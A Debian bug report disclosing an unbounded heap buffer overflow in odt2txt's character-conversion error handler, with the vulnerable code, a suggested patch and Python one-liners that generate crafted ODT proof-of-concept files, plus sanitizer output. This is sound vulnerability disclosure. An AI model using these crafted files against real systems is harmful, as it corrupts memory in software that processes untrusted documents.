Package: odt2txt
Version: 0.5-7
Severity: normal
Tags: upstream

Dear Maintainer,

## Summary

A crafted ODT file triggers an unbounded heap buffer overflow in
odt2txt's character encoding conversion.  The EILSEQ error handler in
conv() (odt2txt.c:296-301) writes to the output buffer and decrements
outleft without first checking that output space remains.  When iconv
fills the output buffer exactly and then encounters an invalid byte,
outleft is zero; the handler writes one byte past the allocation and
wraps outleft to SIZE_MAX, disabling all subsequent growth checks.

Every remaining input byte then overflows the heap.

## Affected code

odt2txt.c, conv(), the EILSEQ/EINVAL error handler:

    } else if ((errno == EILSEQ) || (errno == EINVAL)) {
        char skip = 1;
        if ((unsigned char)*doc > 0x80)
            skip += utf8_length[(unsigned char)*doc - 0x80];
        doc += skip;
        inleft -= skip;

        *out = '?';    /* no check that outleft > 0 */
        out++;
        outleft--;     /* wraps size_t 0 to SIZE_MAX */
        continue;
    }

The output buffer is allocated as malloc(4096) at line 268.  The
growth check (line 272: `if (!outleft)`) only runs at the top of each
loop iteration, after iconv returns.  When iconv consumes exactly
4096 bytes of valid output and then returns EILSEQ for the next
(invalid) input byte, outleft is zero but the handler runs without
reaching the growth check.

## Trigger conditions

1. The input to conv() must contain an invalid UTF-8 byte at a
   position that is a multiple of 4096 (the alloc_step) in the
   output stream.

2. glibc's iconv must return EILSEQ rather than E2BIG when both
   the output buffer is full and the input is invalid.  glibc checks
   input validity before output space, so this holds on all glibc
   versions (verified on 2.39).  This is the libc used by Debian.

Condition 1 is met by placing the invalid byte at an exact offset
in the ODT's content.xml.  The format_doc() and wrap() pipeline is
deterministic for a given input, so the offset can be precomputed.

## Reproduction

Generate the crafted ODT (requires Python 3):

    python3 -c '
    import zipfile
    payload = b"A" * 4095 + b"\xfe" + b"B"
    xml = (
        b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        b"<office:document-content"
        b" xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\""
        b" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\">"
        b"<office:body><office:text>"
        b"<text:p text:style-name=\"Standard\">" + payload + b"</text:p>"
b"</office:text></office:body></office:document-content>"
    )
    with zipfile.ZipFile("poc.odt", "w") as z:
        z.writestr("content.xml", xml)
    '

Build with AddressSanitizer and run:

    cc -fsanitize=address -g -O0 -o odt2txt \
       odt2txt.c regex.c mem.c strbuf.c \
       kunzip/fileio.c kunzip/zipfile.c -lz

    ./odt2txt --encoding=us-ascii poc.odt

Result:

    ==PID==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
    WRITE of size 1 at 0x... thread T0
        #0 in conv odt2txt.c:298
        #1 in main odt2txt.c:578
    0x... is located 0 bytes after 4096-byte region [0x...,0x...)
    allocated by thread T0 here:
        #0 in malloc

        #1 in conv odt2txt.c:268

The issue can also be verified on a stock debian build showing invalid writes:

==2464380== Memcheck, a memory error detector
==2464380== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==2464380== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
==2464380== Command: odt2txt --encoding=us-ascii /home/mstevens/poc-large.odt
==2464380==
==2464380== Invalid write of size 1
==2464380==    at 0x10A83C: ??? (in /usr/bin/odt2txt.odt2txt)
==2464380==    by 0x48A1249: (below main) (libc_start_call_main.h:58)
==2464380==  Address 0x4a5f040 is 0 bytes after a block of size 4,096 alloc'd
==2464380==    at 0x48417B4: malloc (vg_replace_malloc.c:381)
==2464380==    by 0x10A750: ??? (in /usr/bin/odt2txt.odt2txt)
==2464380==    by 0x48A1249: (below main) (libc_start_call_main.h:58)


The overflow is unbounded: replacing the trailing "B" in the payload
with N bytes of content causes N bytes of heap overwrite beyond the
4096-byte buffer.  This can be verified observationally without ASan:

    python3 -c '
    import zipfile
    payload = b"A" * 4095 + b"\xfe" + b"A" * (2*1024*1024)
    xml = (
        b"<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        b"<office:document-content"
        b" xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\""
        b" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\">"
        b"<office:body><office:text>"
        b"<text:p text:style-name=\"Standard\">" + payload + b"</text:p>"
b"</office:text></office:body></office:document-content>"
    )
    with zipfile.ZipFile("poc-large.odt", "w") as z:
        z.writestr("content.xml", xml)
    '

    make clean && make
    ./odt2txt --encoding=us-ascii poc-large.odt | wc -c

Expected output is ~4100 bytes; actual output is 2,101,251 bytes.
The excess comes from conv() writing 2MB of iconv output past the
4096-byte buffer into the heap, then strbuf_slurp_n treating the
corrupted out-pointer distance as the output length.

## Impact

An attacker who can cause odt2txt to process a crafted ODT file
achieves unbounded heap corruption.  The overflow writes iconv-
converted content (attacker-influenced but not fully controlled)
over adjacent heap chunks.

On a stock Debian build, the overflow does not produce a crash in
this particular program because the output buffer happens to be
adjacent to glibc's top chunk, and glibc's realloc expands into it
without validating the corrupted metadata.  A crash is reliably
produced under AddressSanitizer.  In a library or daemon context
where the allocation is not top-chunk-adjacent, the corrupted heap
metadata would cause glibc to abort or segfault on the next
malloc/realloc/free.

## Additional issues in the same error handler

The same EILSEQ handler has a second bug: `inleft -= skip` can
underflow.  skip is 1 + utf8_length[byte - 0x80], which can be up
to 6.  If fewer than skip bytes remain in the input, inleft (size_t)
wraps to near SIZE_MAX and the loop reads far past the input buffer.
This is harder to reach through the normal ODT pipeline because
wrap() always appends trailing newlines, but it compounds the
severity of the error handler's missing bounds checks.

## Suggested fix

Check outleft before writing in the EILSEQ/EINVAL handler, and
clamp skip to inleft:

    } else if ((errno == EILSEQ) || (errno == EINVAL)) {
        char skip = 1;
        if ((unsigned char)*doc > 0x80)
            skip += utf8_length[(unsigned char)*doc - 0x80];
    +   if ((size_t)skip > inleft)
    +       skip = inleft;
        doc += skip;
        inleft -= skip;

    +   if (!outleft) {
    +       outlen += alloc_step; outleft += alloc_step;
    +       yrealloc_buf(&outbuf, &out, outlen);
    +   }
        *out = '?';
        out++;
        outleft--;
        continue;
    } 

I have already contacted [email protected] who recommended filing the
issue publicly.

-- System Information:
Debian Release: 12.13
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable-security'), (500, 
'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 6.1.0-40-amd64 (SMP w/2 CPU threads; PREEMPT)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages odt2txt depends on:
ii  libc6   2.36-9+deb12u13
ii  zlib1g  1:1.2.13.dfsg-1

odt2txt recommends no packages.

odt2txt suggests no packages.

-- debconf-show failed

Reply via email to